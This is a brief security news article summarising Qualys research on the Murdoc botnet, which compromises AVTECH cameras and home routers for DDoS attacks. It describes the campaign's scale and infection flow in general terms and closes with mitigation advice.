Qualys uncovers large-scale Murdoc Botnet campaign
Targets cameras, routers and other IoT devices
The Qualys Threat Research Unit has dubbed the campaign the Murdoc Botnet. This variant exploits vulnerabilities in AVTECH cameras and Huawei HG532 routers, infiltrating devices and creating extensive botnet networks.
Utilising a FOFA query, researchers identified over 1,300 active IP addresses involved in the campaign, which has been active since July 2024. More than 100 servers have been associated with the attacks, targeting devices around the world.
While the campaign has affected companies in the UK and the US, the most impacted countries are Malaysia, Thailand, Mexico and Indonesia.
The Murdoc Botnet leverages vulnerabilities to install malicious payloads on devices such as IP cameras, routers and other IoT systems. The botnet gains control by executing shell scripts and ELF files, enabling attackers to conduct DDoS attacks and distribute malware.
The campaign uses an established infection flow, which involves downloading a shell script, assigning execution permissions to the script, and deploying and subsequently deleting the payload to maintain stealth.
The research team identified over 500 malware samples, each employing variations of the same mechanism. The payloads, often embedded in bash scripts, specifically target vulnerable devices, including AVTECH cameras and TP-Link routers.
The researchers uncovered more than 100 command-and-control servers facilitating malware distribution. These servers communicate with compromised devices, ensuring the botnet’s propagation and operation.
To mitigate the risks posed by the Murdoc Botnet, Qualys advises monitoring processes and network activity for anomalies, avoiding the execution of scripts from untrusted sources and keeping devices and firmware updated with the latest security patches.